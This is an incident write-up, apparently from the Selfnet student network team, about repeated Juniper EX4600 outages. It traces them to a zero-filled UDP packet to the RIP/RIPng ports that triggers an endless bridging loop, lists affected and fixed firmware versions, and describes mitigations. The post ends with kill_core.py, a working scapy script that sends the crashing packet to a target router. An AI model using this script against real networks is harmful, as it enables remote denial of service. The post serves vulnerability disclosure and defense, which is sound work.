Tale of the JuRIPer-Bug
Since the beginning of January we’ve had several problems with one of our core routers which seemed related to the outages in September last year. We can now say: This problem has finally been solved.
But let’s start at the beginning. On Friday, September 6th of 2019 the Selfnet core network was completely offline for a few hours. The reason back then was a firmware problem after we installed our new Juniper EX4600 which could be solved by downgrading to an older version and waiting for another update (see the article Outage RFO for September 6th/7th, 2019).
Before Christmas 2019 we changed to a newer version (after having successfully tested it for some time) as the old version would no longer be maintained. Everything seemed to be fine so we mentally marked the problem as done. But damn were we wrong…
On Friday (again a Friday…) January 24th, 2020 around 7:20AM, the core network broke down completely. When we noticed that and after some of our volunteers arrived onsite we could stabilize the network around 9:30 AM. As we just installed a new NAT server the evening before we assumed there was something wrong with it. We thought it had been overwhelmed by the traffic of our members in the morning. So we switched to the older backup NAT hardware and set the new one aside for debugging.
Then we began to notice similarities to the problem observed in September, but since the software upgrade in December the active user traffic was not routed via this stack of hardware. So it seemed like we had the same bug all over again.
Meanwhile we collected logs and engaged with our device manufacturer Juniper for a solution.
The main problem with this type of bug is a bit ironical: The router was not completely broken, so the network did not failover to the redundant hardware. Our network control plane was in a kind of zombie state, half dead and half alive.
Message from syslogd at Jan 25 12:56:25 ...
dc-pfe: SCHED: Thread 11 (Ethernet) ran for 1441 ms without
yielding
Message from syslogd at Jan 25 12:56:25 ...
dc-pfe: Scheduler Oinker
Message from syslogd at Jan 25 12:56:25 ...
dc-pfe: Frame 0: sp = 0x21bc9fa0, pc = 0x8048b2a
Message from syslogd at Jan 25 12:56:25 ...
dc-pfe: Frame 1: sp = 0x21bc9fb0, pc = 0x80567cf
It just gave messages like this, having a 99% CPU utilization of the packet forwarding engine (especially the fxpc process) and dumped core images of the software. Then after a while, it would start working again for a moment until breaking down again.
We tried switching to an even newer major software version and hoped for the bug to be eradicated there. It looked good… for a while.
But then it happened again and again, usually around 4AM and 8PM, which was interesting since there were no obvious connections to user traffic peaks. It just started from one moment to another and then the link between the core and the NAT would be saturated with packets. Furthermore as the issue caused high CPU load on the affected device it made debugging difficult and caused additional latencies in the whole network, affecting our storage cluster which in return caused degraded performance for most other services (support systems, radius, …).
Further debugging seemed to show that the device’s internal ddos-protection triggers shortly before an outage. We tried to investigate this but couldn’t find any conclusive reason what tripped the ddos protections. So finally we migrated the main traffic to another device and just switched back to our affected device when we were actively debugging it.
While collecting debugging logs we noticed one IP-address that had a lot of traffic to our core router shortly before any outage. We analyzed this traffic and finally found a packet that caused a bridging loop between NAT server and core device! The originating IP was Netscout Arbor, which is a service scanning the entire internet for vulnerabilities and reporting them. Well, seems we found one…
With that information we were even able to reproduce the packet (see below for our script to test yourself): it is an UDP packet to port 520 which is the common port for the Routing Information Protocol (RIP). We don’t use that protocol and it should not have been active. Our tests showed that port 521 (RIPng) was also affected. The packet didn’t even have to contain anything but zeroes, so no routing information itself was handled. Just receiving the packet caused the problem.
The core router would reply to this input packet from the Internet with the exact same packet, including the exact same source and destination MAC, TTL and so on. We were a bit confused about this, as at least the source and destination MAC should have been changed and the TTL decreased. The NAT server would look at the packet returned from the core router and route it back to the core, as the destination MAC still was the one of the core device and it should go there, right? And as the NAT is in transparent mode it did not decrease the TTL of the packet as well, so it never timed out and pinged between core and NAT forever.
Example Packet:
<Ether dst=f0:4b:3a:a2:b2:3f src=a8:d0:e5:5c:1b:00 type=0x800
|<IP version=4 ihl=5 tos=0x0 len=52 id=54321 flags= frag=0 ttl=242 proto=udp src=146.88.240.4 dst=141.70.124.114 options=[]
|<UDP sport=55377 dport=521 len=32 chksum=0x0
|<Raw load='\ x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00' |>>>>
We even set up a testlab and could confirm that the problem occurs with a fresh installation in minimal configuration as well. We also experimented with different software release versions and made a discovery: in earlier versions this bug did not occur and the packet would just be ignored by the device (as it should) but newer versions showed this bug:
- 17.1R3.6 - normal behaviour
- 17.2R3.4 - normal behaviour
- 17.3R3.10 - normal behaviour
- 18.1R2.6 - normal behaviour
- 18.1R3-S8 - bug occured
- 19.3R2.9 - bug occured
So the problem seems to be introduced somewhere after 18.1R2.6 and before 18.1R3-S8. Which is kind of a problem because 18.1R3-S8 is the JTAC recommended version (according to Juniper KB21476 at that time).
Considering that we could also trigger it from anywhere over the internet (we tested it from one of our member’s DSL), it seemed quite serious and could possibly affect many users with transparent firewalls, worldwide. We reported the findings with our small script (kill_core.py) to Juniper and escalated the issue. We weren’t even sure about the true scope as Juniper uses a unified system on all of their devices so other models could be also affected like the QFX5100 which uses the same base hardware (?). We could not confirm this as we don’t own one of these devices though.
Meanwhile we implemented some firewall filters to protect our devices from the bug. It was quite simple as you just need to implement a filter on the lo0-loopback interface to prevent those UDP packets from going into the routing engine. After this hotfix the devices worked without a problem… until we discovered that the bug could also be triggered by sending an IPv6 UDP packet to the IPv4 ports. We assume that it took longer to recognize this issue as the address space is way larger and Arbor has a higher scan interval.
Since then we also changed the configuration of our NAT/transparent firewall setup so that it replaces the source MAC on outgoing packets in any case which should prevent problems like this flood in the future.
After some time we received the confirmation of Juniper labs being able to reproduce the bug but the information regarding the trigger or root cause is confidential and could not be disclosed. But nevertheless JTAC is now informed and can help customers reporting similar problems. Juniper also told us that there will be a new software version having this bug fixed which is released in May 2020.
According to Juniper the following versions should have the issue fixed:
- 18.4R1-S5
- 18.4R3
- 19.2R2
- 19.3R3
- 19.4R2
- 18.3R3-S1
- 18.2R3-S3
- 17.3R3-S7
- 18.1R3-S9
- 18.4R2-S3
- 19.1R3
- 19.1R2-S1
- 20.1DCB
- 18.1R3-S10
Thanks to all of our members who helped in any way to solve this problem. We also apologize to all users of our network, as it wasn’t quite stable during the period of recognizing the bug and debugging it.
Do you want to participate in taking care of such problems in the future? For our network to run smoothly there are a lot of different things to do: management of the equipment (including buying new stuff and getting service), taking care of servers for the network or additional services, debugging problems like this or connecting new dormitories to our network.
If you want to volunteer, it doesn’t matter if you are a pro or a starter: Selfnet offers the opportunity to learn everything required. If you are interested in technical stuff, programming, public relations, project management or anything else: We would be glad to welcome you in our team! Just visit our support hours (once the office hours are re-opened).
The Selfnet-Team
kill_core.py
from scapy.all import Ether, IPv6, UDP, Raw, sendp
SOURCE_MAC = "00:80:41:33:05:04" # my laptop at home (where I sent the packet from)
SOURCE_ADDR = "2001:db8::beef" # my laptops address as source
SOURCE_INTF = "wlp3s0" # wifi...
GATEWAY_MAC = "00:80:41:18:5b:0e" # my crappy wifi router
TARGET = "2001:db8::affe" # our juniper box as the target
frame = Ether(
src=SOURCE_MAC,
dst=GATEWAY_MAC,
type=0x86dd,
) / IPv6(
version=6,
src=SOURCE_ADDR,
dst=TARGET,
) / UDP(
sport=55377,
dport=520, # RIP
len=32,
chksum=0x0,
) / Raw(
load="\x00" * 24,
)
print(repr(frame))
sendp(frame, iface=SOURCE_INTF)